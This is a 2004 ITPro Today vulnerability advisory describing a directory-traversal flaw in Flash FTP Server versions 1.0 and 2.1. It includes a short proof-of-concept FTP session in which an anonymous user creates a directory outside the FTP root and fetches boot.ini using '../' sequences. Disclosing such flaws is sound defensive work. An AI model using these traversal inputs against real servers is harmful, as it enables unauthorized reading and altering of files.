Directory Traversal Vulnerability in Flash FTP Server for Windows

Flash FTP Server contains a directory-traversal vulnerability.

Ken Pfeil

January 5, 2004

2 Min Read
ITPro Today logo in a gray background | ITPro Today

Reported January 5, 2004 by dr insane.

 

 

VERSIONS AFFECTED

 

·       Flash FTP Server 1.0 and 2.1

 

DESCRIPTION

 

Flash FTP Server contains a directory-traversal vulnerability. By performing a simple process (as outlined in the demonstration below), an attacker can read or modify files and directories that reside anywhere on the vulnerable system.

 
DEMONSTRATION
 
The discoverer posted the following demonstration as proof of concept:

 

Creation of a directory outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:..............owned': directory created.

Retrieving of a file outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini

 

VENDOR RESPONSE

 

NET2SOFT has been notified.

 

CREDIT

Discovered bydr_insane.

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like